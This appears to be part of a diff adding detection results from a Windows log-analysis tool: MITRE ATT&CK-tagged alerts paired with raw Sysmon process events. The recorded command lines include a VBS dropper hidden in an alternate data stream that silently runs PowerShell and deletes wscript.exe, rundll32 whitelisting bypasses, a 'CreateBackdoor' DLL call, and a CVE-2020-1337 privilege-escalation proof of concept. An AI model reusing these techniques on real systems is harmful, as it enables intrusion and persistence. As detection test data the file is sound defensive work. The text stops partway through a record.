+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-09T02:52:23.500263Z"">
+    </TimeCreated>
+    <EventRecordID>11238</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1988"" ThreadID=""228"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-09 02:52:23.484</Data>
+    <Data Name=""ProcessGuid"">365ABB72-95E7-5CD3-0000-001046950F00</Data>
+    <Data Name=""ProcessId"">2812</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;  /C &quot;echo Dim objShell:Dim oFso:Set oFso = CreateObject(&quot;Scripting.FileSystemObject&quot;):Set objShell = WScript.CreateObject(&quot;WScript.Shell&quot;):command = &quot;powershell.exe&quot;:objShell.Run command, 0:command = &quot;C:\Windows\System32\cmd.exe /c &quot;&quot;start /b &quot;&quot;&quot;&quot; cmd /c &quot;&quot;timeout /t 5 &gt;nul&amp;&amp;del C:\Windows\wscript.exe&amp;&amp;del C:\Windows\wscript.exe.manifest&quot;&quot;&quot;&quot;&quot;:objShell.Run command, 0:Set objShell = Nothing &gt; &quot;C:\Users\IEUser\AppData:tghjx5xz2ky.vbs&quot;&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\onedrive\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-94CD-5CD3-0000-0020DD3A0100</Data>
+    <Data Name=""LogonId"">0x13add</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-9570-5CD3-0000-00103FC90A00</Data>
+    <Data Name=""ParentProcessId"">1900</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">powershell</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
+    </TimeCreated>
+    <EventRecordID>423994</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
+    <Data Name=""ProcessId"">3396</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
+    <Data Name=""LogonId"">0x8a585</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
+    <Data Name=""ParentProcessId"">7624</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
+    <Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
+    </TimeCreated>
+    <EventRecordID>423994</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
+    <Data Name=""ProcessId"">3396</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
+    <Data Name=""LogonId"">0x8a585</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
+    <Data Name=""ParentProcessId"">7624</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
+    <Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-23T21:57:36.014784Z"">
+    </TimeCreated>
+    <EventRecordID>423994</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3208"" ThreadID=""4804"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-23 21:57:36.012</Data>
+    <Data Name=""ProcessGuid"">747F3D96-51D0-5F93-0000-001036A15B00</Data>
+    <Data Name=""ProcessId"">3396</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; conf3234.dll f8753 d948</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Local\Temp\tmp1375\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002085A50800</Data>
+    <Data Name=""LogonId"">0x8a585</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-51CD-5F93-0000-001073735B00</Data>
+    <Data Name=""ParentProcessId"">7624</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\test.tmp</Data>
+    <Data Name=""ParentCommandLine"">c:\Users\Public\test.tmp </Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:39.441933Z"">
+    </TimeCreated>
+    <EventRecordID>243568</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:39.417</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F77-5E75-0000-001090F32000</Data>
+    <Data Name=""ProcessId"">2416</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9F61-5E75-0000-0010686A1E00</Data>
+    <Data Name=""ParentProcessId"">4848</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:01.637860Z"">
+    </TimeCreated>
+    <EventRecordID>342412</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:01.636</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E939-5F33-0000-0010ACAB0E00</Data>
+    <Data Name=""ProcessId"">7852</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-E911-5F33-0000-0020241C0400</Data>
+    <Data Name=""LogonId"">0x41c24</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-E938-5F33-0000-00109CA00E00</Data>
+    <Data Name=""ParentProcessId"">7820</Data>
+    <Data Name=""ParentImage"">C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe</Data>
+    <Data Name=""ParentCommandLine"">WerTrigger.exe</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-26T15:47:56.667118Z"">
+    </TimeCreated>
+    <EventRecordID>5408</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-26 15:47:56.627</Data>
+    <Data Name=""ProcessGuid"">365ABB72-B52C-5CEA-0000-00107A0D1100</Data>
+    <Data Name=""ProcessId"">3388</Data>
+    <Data Name=""Image"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Notepad</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">c:\windows\system32\inetsrv\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-B26B-5CEA-0000-0010582A0800</Data>
+    <Data Name=""ParentProcessId"">2744</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;cmd.exe&quot; /c notepad.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-01-14T20:48:17.412145Z"">
+    </TimeCreated>
+    <EventRecordID>345</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1840"" ThreadID=""8032"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-01-14 20:48:17.270</Data>
+    <Data Name=""ProcessGuid"">747F3D96-2911-5E1E-0000-0010D80A7D00</Data>
+    <Data Name=""ProcessId"">2416</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">&quot;cmd.exe&quot; /c notepad.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
+    <Data Name=""LogonId"">0x7cef82</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
+    <Data Name=""ParentProcessId"">4448</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd.exe /c start ms-browser://</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-04T09:10:30.972590Z"">
+    </TimeCreated>
+    <EventRecordID>5703</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2780"" ThreadID=""3676"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-04 09:10:30.702</Data>
+    <Data Name=""ProcessGuid"">747F3D96-A106-5D46-0000-00102425BD03</Data>
+    <Data Name=""ProcessId"">6604</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
+    <Data Name=""LogonId"">0x18d3b3</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-A106-5D46-0000-00107201BD03</Data>
+    <Data Name=""ParentProcessId"">1380</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\control.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\control.exe&quot;  /name Microsoft.BackupAndRestoreCenter</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-08-12T13:06:00.737148Z"">
+    </TimeCreated>
+    <EventRecordID>342411</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3344"" ThreadID=""4176"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-08-12 13:06:00.734</Data>
+    <Data Name=""ProcessGuid"">747F3D96-E938-5F33-0000-00101CA50E00</Data>
+    <Data Name=""ProcessId"">7836</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">Cmd.Exe</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e &gt; nul 2&gt;&amp;1</Data>
